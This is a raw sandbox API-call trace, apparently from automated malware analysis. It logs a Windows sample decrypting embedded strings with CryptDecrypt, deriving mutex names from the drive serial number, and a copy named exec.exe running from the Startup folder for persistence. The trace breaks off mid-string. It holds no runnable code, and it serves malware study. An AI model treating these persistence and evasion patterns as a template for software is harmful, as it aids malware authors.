returned 0xb31b08 [0102.374] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x8, Size=0x3c) returned 0xb31b48 [0102.374] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x8, Size=0x31) returned 0xb31b90 [0102.374] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x8, Size=0x17) returned 0xb31bd0 [0102.374] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x8, Size=0x24) returned 0xb31bf0 [0102.374] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x8, Size=0x14) returned 0xb31c20 [0102.374] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x8, Size=0xd) returned 0xb31c40 [0102.374] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x8, Size=0x25) returned 0xb31c58 [0102.374] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x8, Size=0x39) returned 0xb31c88 [0102.374] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x8, Size=0x18) returned 0xb31cd0 [0102.374] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x8, Size=0x17) returned 0xb31cf0 [0102.374] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x8, Size=0xe) returned 0xb31d10 [0102.374] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x8, Size=0x69) returned 0xb31d28 [0102.374] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x8, Size=0x3e) returned 0xb31da0 [0102.374] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x8, Size=0x1b) returned 0xb31de8 [0102.374] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x8, Size=0x1d) returned 0xb31e10 [0102.374] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x8, Size=0x48) returned 0xb31e38 [0102.374] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x8, Size=0x12) returned 0xb31e88 [0102.374] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x8, Size=0x18) returned 0xb31ea8 [0102.374] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x8, Size=0x1b) returned 0xb31ec8 [0102.375] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x8, Size=0x24) returned 0xb31ef0 [0102.375] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x8, Size=0x29) returned 0xb31f20 [0102.375] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x8, Size=0x1e) returned 0xb31f58 [0102.375] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x8, Size=0x41) returned 0xb31f80 [0102.375] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x8, Size=0x17) returned 0xb31fd0 [0102.375] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x8, Size=0x14) returned 0xb31ff0 [0102.375] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x8, Size=0xf) returned 0xb32010 [0102.375] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x8, Size=0x16) returned 0xb32028 [0102.375] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x8, Size=0x2a) returned 0xb32048 [0102.375] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x8, Size=0x29) returned 0xb32080 [0102.375] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x8, Size=0x15) returned 0xb320b8 [0102.375] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x8, Size=0x1e) returned 0xb320d8 [0102.375] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x8, Size=0x2a) returned 0xb32100 [0102.375] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x8, Size=0x12) returned 0xb32138 [0102.375] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x8, Size=0x18) returned 0xb32158 [0102.375] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x8, Size=0x46) returned 0xb32178 [0102.375] HeapFree (in: hHeap=0xb30000, dwFlags=0x0, lpMem=0xb311f8 | out: hHeap=0xb30000) returned 1 [0102.376] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0102.376] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x8, Size=0x80) returned 0xb311f8 [0102.376] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1028136) returned 0x0 [0102.376] RtlSizeHeap (HeapHandle=0xb30000, Flags=0x0, MemoryPointer=0xb311f8) returned 0x80 [0102.376] GetLastError () returned 0x0 [0102.376] SetLastError (dwErrCode=0x0) [0102.376] GetLastError () returned 0x0 [0102.376] SetLastError (dwErrCode=0x0) [0102.377] GetLastError () returned 0x0 [0102.377] SetLastError (dwErrCode=0x0) [0102.377] GetLastError () returned 0x0 [0102.377] SetLastError (dwErrCode=0x0) [0102.377] GetLastError () returned 0x0 [0102.377] SetLastError (dwErrCode=0x0) [0102.377] GetLastError () returned 0x0 [0102.377] SetLastError (dwErrCode=0x0) [0102.377] GetLastError () returned 0x0 [0102.377] SetLastError (dwErrCode=0x0) [0102.377] GetLastError () returned 0x0 [0102.377] SetLastError (dwErrCode=0x0) [0102.377] GetLastError () returned 0x0 [0102.377] SetLastError (dwErrCode=0x0) [0102.377] GetLastError () returned 0x0 [0102.377] SetLastError (dwErrCode=0x0) [0102.377] GetLastError () returned 0x0 [0102.377] SetLastError (dwErrCode=0x0) [0102.377] GetLastError () returned 0x0 [0102.377] SetLastError (dwErrCode=0x0) [0102.377] GetLastError () returned 0x0 [0102.378] SetLastError (dwErrCode=0x0) [0102.378] GetLastError () returned 0x0 [0102.378] SetLastError (dwErrCode=0x0) [0102.378] GetLastError () returned 0x0 [0102.378] SetLastError (dwErrCode=0x0) [0102.378] GetLastError () returned 0x0 [0102.378] SetLastError (dwErrCode=0x0) [0102.378] GetLastError () returned 0x0 [0102.378] SetLastError (dwErrCode=0x0) [0102.378] GetLastError () returned 0x0 [0102.378] SetLastError (dwErrCode=0x0) [0102.378] GetLastError () returned 0x0 [0102.378] SetLastError (dwErrCode=0x0) [0102.378] GetLastError () returned 0x0 [0102.378] SetLastError (dwErrCode=0x0) [0102.378] GetLastError () returned 0x0 [0102.378] SetLastError (dwErrCode=0x0) [0102.378] GetLastError () returned 0x0 [0102.378] SetLastError (dwErrCode=0x0) [0102.378] GetLastError () returned 0x0 [0102.379] SetLastError (dwErrCode=0x0) [0102.379] GetLastError () returned 0x0 [0102.379] SetLastError (dwErrCode=0x0) [0102.379] GetLastError () returned 0x0 [0102.379] SetLastError (dwErrCode=0x0) [0102.379] GetLastError () returned 0x0 [0102.379] SetLastError (dwErrCode=0x0) [0102.379] GetLastError () returned 0x0 [0102.379] SetLastError (dwErrCode=0x0) [0102.379] GetLastError () returned 0x0 [0102.379] SetLastError (dwErrCode=0x0) [0102.379] GetLastError () returned 0x0 [0102.379] SetLastError (dwErrCode=0x0) [0102.379] GetLastError () returned 0x0 [0102.379] SetLastError (dwErrCode=0x0) [0102.379] GetLastError () returned 0x0 [0102.379] SetLastError (dwErrCode=0x0) [0102.379] GetLastError () returned 0x0 [0102.379] SetLastError (dwErrCode=0x0) [0102.379] GetLastError () returned 0x0 [0102.379] SetLastError (dwErrCode=0x0) [0102.379] GetLastError () returned 0x0 [0102.380] SetLastError (dwErrCode=0x0) [0102.380] GetLastError () returned 0x0 [0102.380] SetLastError (dwErrCode=0x0) [0102.380] GetLastError () returned 0x0 [0102.380] SetLastError (dwErrCode=0x0) [0102.380] GetLastError () returned 0x0 [0102.380] SetLastError (dwErrCode=0x0) [0102.380] GetLastError () returned 0x0 [0102.380] SetLastError (dwErrCode=0x0) [0102.380] GetLastError () returned 0x0 [0102.380] SetLastError (dwErrCode=0x0) [0102.380] GetLastError () returned 0x0 [0102.380] SetLastError (dwErrCode=0x0) [0102.380] GetLastError () returned 0x0 [0102.380] SetLastError (dwErrCode=0x0) [0102.380] GetLastError () returned 0x0 [0102.380] SetLastError (dwErrCode=0x0) [0102.380] GetLastError () returned 0x0 [0102.380] SetLastError (dwErrCode=0x0) [0102.380] GetLastError () returned 0x0 [0102.380] SetLastError (dwErrCode=0x0) [0102.380] GetLastError () returned 0x0 [0102.381] SetLastError (dwErrCode=0x0) [0102.381] GetLastError () returned 0x0 [0102.381] SetLastError (dwErrCode=0x0) [0102.381] GetLastError () returned 0x0 [0102.381] SetLastError (dwErrCode=0x0) [0102.381] GetLastError () returned 0x0 [0102.381] SetLastError (dwErrCode=0x0) [0102.381] GetLastError () returned 0x0 [0102.381] SetLastError (dwErrCode=0x0) [0102.381] GetLastError () returned 0x0 [0102.381] SetLastError (dwErrCode=0x0) [0102.381] GetLastError () returned 0x0 [0102.381] SetLastError (dwErrCode=0x0) [0102.381] GetLastError () returned 0x0 [0102.381] SetLastError (dwErrCode=0x0) [0102.381] GetLastError () returned 0x0 [0102.381] SetLastError (dwErrCode=0x0) [0102.381] GetLastError () returned 0x0 [0102.381] SetLastError (dwErrCode=0x0) [0103.654] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x0, Size=0x30) returned 0xb31280 [0103.654] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x0, Size=0x3300) returned 0xb321c8 [0103.654] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x0, Size=0x15c) returned 0xb312b8 [0103.654] GetTickCount () returned 0x5f5e [0103.654] GetLastError () returned 0x0 [0103.655] SetLastError (dwErrCode=0x0) [0103.655] GetLocaleInfoW (in: Locale=0x800, LCType=0x58, lpLCData=0x14fe48, cchData=32 | out: lpLCData="\x03") returned 16 [0103.656] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x0, Size=0x1c) returned 0xb31420 [0103.656] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x0, Size=0x1c) returned 0xb31448 [0103.656] GetVersion () returned 0x1db10106 [0103.656] GetCurrentProcess () returned 0xffffffff [0103.656] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x14fdac | out: TokenHandle=0x14fdac*=0x80) returned 1 [0103.656] GetTokenInformation (in: TokenHandle=0x80, TokenInformationClass=0x14, TokenInformation=0x14fda4, TokenInformationLength=0x4, ReturnLength=0x14fda8 | out: TokenInformation=0x14fda4, ReturnLength=0x14fda8) returned 1 [0103.656] CloseHandle (hObject=0x80) returned 1 [0103.656] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x0, Size=0x20) returned 0xb31470 [0103.656] CryptAcquireContextW (in: phProv=0x102fcf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x102fcf0*=0x465098) returned 1 [0103.740] CryptImportKey (in: hProv=0x465098, pbData=0x14fca0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x14fd08 | out: phKey=0x14fd08*=0x464c68) returned 1 [0103.740] CryptSetKeyParam (hKey=0x464c68, dwParam=0x1, pbData=0x14fcf0, dwFlags=0x0) returned 1 [0103.740] CryptDecrypt (in: hKey=0x464c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xb31470, pdwDataLen=0x14fcbc | out: pbData=0xb31470, pdwDataLen=0x14fcbc) returned 1 [0103.741] CryptDestroyKey (hKey=0x464c68) returned 1 [0103.741] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x8, Size=0x1e) returned 0xb31498 [0103.741] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x0, Size=0x1e) returned 0xb314c0 [0103.741] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x0, Size=0x90) returned 0xb314e8 [0103.741] CryptImportKey (in: hProv=0x465098, pbData=0x14fc78, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x14fce0 | out: phKey=0x14fce0*=0x464c68) returned 1 [0103.741] CryptSetKeyParam (hKey=0x464c68, dwParam=0x1, pbData=0x14fcc8, dwFlags=0x0) returned 1 [0103.741] CryptDecrypt (in: hKey=0x464c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xb314e8, pdwDataLen=0x14fc94 | out: pbData=0xb314e8, pdwDataLen=0x14fc94) returned 1 [0103.741] CryptDestroyKey (hKey=0x464c68) returned 1 [0103.741] HeapFree (in: hHeap=0xb30000, dwFlags=0x0, lpMem=0xb314e8 | out: hHeap=0xb30000) returned 1 [0103.741] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0xb31498, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0103.741] HeapFree (in: hHeap=0xb30000, dwFlags=0x0, lpMem=0xb314c0 | out: hHeap=0xb30000) returned 1 [0103.741] HeapFree (in: hHeap=0xb30000, dwFlags=0x0, lpMem=0xb31470 | out: hHeap=0xb30000) returned 1 [0103.741] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x14fd48, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x14fd48*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0103.741] HeapFree (in: hHeap=0xb30000, dwFlags=0x0, lpMem=0xb31498 | out: hHeap=0xb30000) returned 1 [0103.741] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x0, Size=0x40) returned 0xb31470 [0103.741] CryptImportKey (in: hProv=0x465098, pbData=0x14fcd4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x14fd3c | out: phKey=0x14fd3c*=0x464c68) returned 1 [0103.742] CryptSetKeyParam (hKey=0x464c68, dwParam=0x1, pbData=0x14fd24, dwFlags=0x0) returned 1 [0103.742] CryptDecrypt (in: hKey=0x464c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xb31470, pdwDataLen=0x14fcf0 | out: pbData=0xb31470, pdwDataLen=0x14fcf0) returned 1 [0103.742] CryptDestroyKey (hKey=0x464c68) returned 1 [0103.742] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x8, Size=0x34) returned 0xb314b8 [0103.742] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x0 [0103.742] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\00019C354B4201") returned 0x84 [0103.742] WaitForSingleObject (hHandle=0x84, dwMilliseconds=0x0) returned 0x0 [0103.742] HeapFree (in: hHeap=0xb30000, dwFlags=0x0, lpMem=0xb31470 | out: hHeap=0xb30000) returned 1 [0103.742] HeapFree (in: hHeap=0xb30000, dwFlags=0x0, lpMem=0xb314b8 | out: hHeap=0xb30000) returned 1 [0103.742] ReleaseMutex (hMutex=0x84) returned 1 [0103.742] CloseHandle (hObject=0x84) returned 1 [0103.742] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x0, Size=0x20) returned 0xb31470 [0103.742] CryptImportKey (in: hProv=0x465098, pbData=0x14fcb4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x14fd1c | out: phKey=0x14fd1c*=0x464c68) returned 1 [0103.742] CryptSetKeyParam (hKey=0x464c68, dwParam=0x1, pbData=0x14fd04, dwFlags=0x0) returned 1 [0103.742] CryptDecrypt (in: hKey=0x464c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xb31470, pdwDataLen=0x14fcd0 | out: pbData=0xb31470, pdwDataLen=0x14fcd0) returned 1 [0103.742] CryptDestroyKey (hKey=0x464c68) returned 1 [0103.742] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x8, Size=0x1e) returned 0xb31498 [0103.742] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x0, Size=0x1e) returned 0xb314c0 [0103.742] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x0, Size=0x90) returned 0xb314e8 [0103.742] CryptImportKey (in: hProv=0x465098, pbData=0x14fc8c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x14fcf4 | out: phKey=0x14fcf4*=0x464c68) returned 1 [0103.742] CryptSetKeyParam (hKey=0x464c68, dwParam=0x1, pbData=0x14fcdc, dwFlags=0x0) returned 1 [0103.742] CryptDecrypt (in: hKey=0x464c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xb314e8, pdwDataLen=0x14fca8 | out: pbData=0xb314e8, pdwDataLen=0x14fca8) returned 1 [0103.742] CryptDestroyKey (hKey=0x464c68) returned 1 [0103.742] HeapFree (in: hHeap=0xb30000, dwFlags=0x0, lpMem=0xb314e8 | out: hHeap=0xb30000) returned 1 [0103.742] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0xb31498, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0103.742] HeapFree (in: hHeap=0xb30000, dwFlags=0x0, lpMem=0xb314c0 | out: hHeap=0xb30000) returned 1 [0103.742] HeapFree (in: hHeap=0xb30000, dwFlags=0x0, lpMem=0xb31470 | out: hHeap=0xb30000) returned 1 [0103.742] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x14fd5c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x14fd5c*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0103.743] HeapFree (in: hHeap=0xb30000, dwFlags=0x0, lpMem=0xb31498 | out: hHeap=0xb30000) returned 1 [0103.743] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x0, Size=0x40) returned 0xb31470 [0103.743] CryptImportKey (in: hProv=0x465098, pbData=0x14fce8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x14fd50 | out: phKey=0x14fd50*=0x464c68) returned 1 [0103.743] CryptSetKeyParam (hKey=0x464c68, dwParam=0x1, pbData=0x14fd38, dwFlags=0x0) returned 1 [0103.743] CryptDecrypt (in: hKey=0x464c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xb31470, pdwDataLen=0x14fd04 | out: pbData=0xb31470, pdwDataLen=0x14fd04) returned 1 [0103.743] CryptDestroyKey (hKey=0x464c68) returned 1 [0103.743] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x8, Size=0x34) returned 0xb314b8 [0103.743] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x84 [0103.743] WaitForSingleObject (hHandle=0x84, dwMilliseconds=0x0) returned 0x102 [0103.743] CloseHandle (hObject=0x84) returned 1 [0103.743] HeapFree (in: hHeap=0xb30000, dwFlags=0x0, lpMem=0xb31470 | out: hHeap=0xb30000) returned 1 [0103.743] HeapFree (in: hHeap=0xb30000, dwFlags=0x0, lpMem=0xb314b8 | out: hHeap=0xb30000) returned 1 [0103.743] HeapFree (in: hHeap=0xb30000, dwFlags=0x0, lpMem=0xb31420 | out: hHeap=0xb30000) returned 1 [0103.743] HeapFree (in: hHeap=0xb30000, dwFlags=0x0, lpMem=0xb31448 | out: hHeap=0xb30000) returned 1 [0103.743] HeapFree (in: hHeap=0xb30000, dwFlags=0x0, lpMem=0xb312b8 | out: hHeap=0xb30000) returned 1 [0103.743] HeapFree (in: hHeap=0xb30000, dwFlags=0x0, lpMem=0xb321c8 | out: hHeap=0xb30000) returned 1 [0103.743] HeapFree (in: hHeap=0xb30000, dwFlags=0x0, lpMem=0xb31280 | out: hHeap=0xb30000) returned 1 [0103.744] GetModuleHandleW (lpModuleName="mscoree.dll") returned 0x0 [0103.744] ExitProcess (uExitCode=0x0) [0103.744] HeapFree (in: hHeap=0xb30000, dwFlags=0x0, lpMem=0xb307d0 | out: hHeap=0xb30000) returned 1 Process: id = "14" image_name = "exec.exe" filename = "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\exec.exe" page_root = "0x1fb47000" os_pid = "0x568" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "autostart" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\exec.exe\" " cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e209" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 89 os_tid = 0x56c [0101.428] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x43f7fc | out: lpSystemTimeAsFileTime=0x43f7fc*(dwLowDateTime=0x441825e0, dwHighDateTime=0x1d4f12b)) [0101.428] GetCurrentProcessId () returned 0x568 [0101.428] GetCurrentThreadId () returned 0x56c [0101.428] GetTickCount () returned 0x56a7 [0101.428] QueryPerformanceCounter (in: lpPerformanceCount=0x43f7f4 | out: lpPerformanceCount=0x43f7f4*=6575364508) returned 1 [0101.428] GetStartupInfoW (in: lpStartupInfo=0x43f7a0 | out: lpStartupInfo=0x43f7a0*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\exec.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x43f804, hStdError=0x838be4)) [0101.428] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0101.428] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x1db0000 [0101.429] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76180000 [0101.429] GetProcAddress (hModule=0x76180000, lpProcName="FlsAlloc") returned 0x76194f2b [0101.430] GetProcAddress (hModule=0x76180000, lpProcName="FlsGetValue") returned 0x76191252 [0101.430] GetProcAddress (hModule=0x76180000, lpProcName="FlsSetValue") returned 0x76194208 [0101.430] GetProcAddress (hModule=0x76180000, lpProcName="FlsFree") returned 0x7619359f [0101.430] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x214) returned 0x1db07d0 [0101.431] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76180000 [0101.431] GetCurrentThreadId () returned 0x56c [0101.431] GetStartupInfoW (in: lpStartupInfo=0x43f73c | out: lpStartupInfo=0x43f73c*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\exec.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x8371aa, hStdOutput=0x8374e3, hStdError=0x1db07d0)) [0101.431] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x800) returned 0x1db09f0 [0101.431] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0101.431] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0101.431] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0101.431] SetHandleCount (uNumber=0x20) returned 0x20 [0101.431] GetCommandLineA () returned="\"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\exec.exe\" " [0101.431] GetEnvironmentStringsW () returned 0x254838* [0101.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1409, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1409 [0101.433] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x581) returned 0x1db11f8 [0101.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1409, lpMultiByteStr=0x1db11f8, cbMultiByte=1409, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1409 [0101.433] FreeEnvironmentStringsW (penv=0x254838) returned 1 [0101.433] GetLastError () returned 0x5 [0101.433] SetLastError (dwErrCode=0x5) [0101.433] GetLastError () returned 0x5 [0101.433] SetLastError (dwErrCode=0x5) [0101.433] GetLastError () returned 0x5 [0101.433] SetLastError (dwErrCode=0x5) [0101.433] GetACP () returned 0x4e4 [0101.433] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x220) returned 0x1db1788 [0101.433] GetLastError () returned 0x5 [0101.434] SetLastError (dwErrCode=0x5) [0101.434] IsValidCodePage (CodePage=0x4e4) returned 1 [0101.434] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x43f704 | out: lpCPInfo=0x43f704) returned 1 [0101.434] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x43f1d0 | out: lpCPInfo=0x43f1d0) returned 1 [0101.434] GetLastError () returned 0x5 [0101.434] SetLastError (dwErrCode=0x5) [0101.434] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x43f5e4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0101.434] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x43f5e4, cbMultiByte=256, lpWideCharStr=0x43ef48, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0101.434] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x43f1e4 | out: lpCharType=0x43f1e4) returned 1 [0101.434] GetLastError () returned 0x5 [0101.434] SetLastError (dwErrCode=0x5) [0101.434] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x43f5e4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0101.434] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x43f5e4, cbMultiByte=256, lpWideCharStr=0x43ef18, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ藱㉭骫\x83Ā") returned 256 [0101.434] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 